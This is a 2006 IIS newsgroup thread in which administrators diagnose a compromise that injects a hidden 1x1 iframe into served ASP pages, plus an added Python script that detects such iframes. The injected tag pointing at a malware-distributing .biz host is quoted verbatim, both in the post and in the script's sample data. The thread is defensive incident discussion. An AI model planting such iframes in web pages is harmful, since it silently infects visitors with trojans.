
iis security : Virus in IFRAME injected into our ASP pages (downloader trojan on client)


Paul Oliver
12/7/2006 4:35:22 PM
Our website was compromised sometime in the last few days, but our
Antivirus (Symantec Corporate) when run on the server doesn't detect it.

It is a Windows Server 2003 Standard server, running SP1 and all the
latest patches. IIS sends down a website to the user with IFRAMEs
injected into the HTML:

<TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG
NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0
CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php
width=1 height=1></iframe></TD></A></TR></TABLE></TD>

The iframe code above pointing to xaqjlyswly.biz does not come from our
code. I looked at the ASP function that generates this link and there
is nothing there that would put that on the page.

The iframe tries to get the user's browser to download the Downloader
virus which, according to Symantec "connects to the Internet and
downloads other Trojan horses"

http://www.symantec.com/security_response/writeup.jsp?docid=2002-101518-4323-99

My local antivirus on my machine caught downloader getting installed
after browsing the site on the infected server.

I used Agent Ransack to look for the string ".biz" across all our
websites source code. The string wasn't found anywhere.

That all leads me to believe that something is getting injected into the
code before it is sent to the end user.

I found an older virus that has similar characteristics called
Download.Ject which infected IIS also. I followed Microsoft's
suggestions for detecting Download.Ject and we don't have it.
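
Paul's check above (the ".biz" string is in the page the server sends but not in the on-disk source) can be scripted so it runs against every site on the box. The following is an added example, not code from the thread or from any of the posters: it parses the HTML the server actually returns, flags any iframe that is 1x1, points to a host outside the site's own domains, or has a src that does not occur in the on-disk ASP source, and uses the snippet from Paul's post as the constructed "served" page. The allow-listed host www.example.com and the ticker.asp iframe are assumptions made for illustration.

```python
"""Flag hidden / off-site IFRAMEs in the HTML that IIS actually serves and
check whether each one also exists in the on-disk ASP source.  An iframe
present in the served page but absent from the source was added at request
time, which is what Paul concluded above.  Added example, not thread code."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the served HTML is the fragment from Paul's post plus one
# legitimate (assumed) ticker iframe; the "source" is the same fragment as it
# sits on disk, i.e. without the injected iframe.
SERVED = """<TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG
NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0
CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php
width=1 height=1></iframe></TD></A></TR></TABLE></TD>
<iframe src="ticker.asp" width=300 height=50></iframe>"""

SOURCE = """<TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG
NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0
CLASS="ltblue"></a></TD></A></TR></TABLE></TD>
<iframe src="ticker.asp" width=300 height=50></iframe>"""

# Assumed: the hosts this site is allowed to frame content from.
OWN_HOSTS = {"www.example.com"}


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # Attribute values may be unquoted (as in the injected tag); the
            # parser handles that, and a valueless attribute yields None.
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value):
    """True for a width/height of 0 or 1 (with or without 'px'): the size
    used to keep an injected frame invisible to the visitor."""
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    return v in ("0", "1")


def find_suspicious_iframes(served_html, source_html, own_hosts):
    """Return one finding per iframe that is hidden, off-site, or missing
    from the on-disk source.  Each finding lists the reasons it was flagged."""
    parser = IframeCollector()
    parser.feed(served_html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()  # "" for relative src
        reasons = []
        if host and host not in own_hosts:
            reasons.append("off-site src " + host)
        if _is_tiny(attrs.get("width", "")) and _is_tiny(attrs.get("height", "")):
            reasons.append("1x1 (hidden) iframe")
        if src and src not in source_html:
            reasons.append("src not present in on-disk source (injected at runtime)")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_iframes(SERVED, SOURCE, OWN_HOSTS):
        print(finding["src"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

In practice the served HTML comes from an HTTP request made against the server itself and the source from the site's wwwroot; the "missing from source" reason is the decisive one, because it separates a defaced file (fix the file, then find how it was written) from output rewritten on the way out (look at the IIS process, its ISAPI filters and extensions, and anything loaded into it).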

wjzhang NO[at]SPAM online.microsoft.com
12/8/2006 12:00:00 AM
Hi Paul,

I believe the current situation indicates your web server got
hacked/attacked.

For such kind of urgent cases of Virus/Trojan, I would like to suggest that
you contact Microsoft Customer Service and Support services as well as some
third-party security and anti-virus services vendor like Symantec for
assistance. You can call our support center via telephone so that a
dedicated Support Professional can assist with this request.

To obtain the phone numbers for specific technology request please take a
look at the web site listed below.

http://support.microsoft.com/default.aspx?scid=fh;EN-US;PHONENUMBERS

If you are outside the US please see http://support.microsoft.com for
regional support phone numbers.

Thanks.

Sincerely,

WenJun Zhang

Microsoft Online Community Support

==================================================

Get notification to my posts through email? Please refer to:
http://msdn.microsoft.com/subscriptions/managednewsgroups/default.aspx#notifications.

Note: The MSDN Managed Newsgroup support offering is for non-urgent issues
where an initial response from the community or a Microsoft Support
Engineer within 1 business day is acceptable. Please note that each follow
up response may take approximately 2 business days as the support
professional working with you may need further investigation to reach the
most efficient resolution. The offering is not appropriate for situations
that require urgent, real-time or phone-based interactions or complex
project analysis and dump analysis issues. Issues of this nature are best
handled working with a dedicated Microsoft Support Engineer by contacting
Microsoft Customer Support Services (CSS) at:

http://msdn.microsoft.com/subscriptions/support/default.aspx.

==================================================

This posting is provided "AS IS" with no warranties, and confers no rights.
dcote NO[at]SPAM dgmdata.com
12/8/2006 5:46:27 PM
We had the same problem on our windows 2003 server today.

We cannot find any information anywhere.

Any ideas???


Paul Oliver wrote:

Leythos
12/9/2006 10:31:25 PM
In article <uelbG$kGHHA.924@TK2MSFTNGP02.phx.gbl>,
PaulOliver@noemail.noemail says...

The reason that Symantec didn't detect it on the server is because the
threat (malware) is not on your server, it's on the remote server.


Put a real firewall in front of your server, block all foreign subnets
not required, rename the administrator account and disable all accounts
not needed, patch the server, etc... Follow ALL of the recommendations
that secure your server.

What services, other than HTTP did you expose?

--

spam999free@rrohio.com
dcote NO[at]SPAM dgmdata.com
12/11/2006 5:33:05 AM
We had to reinstall IIS on the server and it did the trick.

By the way, we tried Windows Defender and the Windows removal tools; both
didn't find anything. And after our tests, IIS was really compromised.
Any website running asp or aspx pages injects the iframe code. The hack
seems to have been at the core of IIS. ISAPI filter deactivation
didn't do the trick.

Any idea anyone what it was?


Leythos wrote:

Leythos
12/11/2006 2:33:01 PM
In article <1165843984.956869.252350@16g2000cwy.googlegroups.com>,
dcote@dgmdata.com says...

I don't think so. Sure, it got it working again, but reinstalling IIS
does not resolve the root cause.


Windows Defender is worthless and unless you set up your server properly
it will happen again. I've had hundreds of IIS based webservers online
since the late days of NT4 and never had one compromised. You need to
properly configure and properly firewall your server, and you need to
properly code sites so that you don't expose your site to exploits in
website code.


No, but you might be able to find information on google.com

--

spam999free@rrohio.com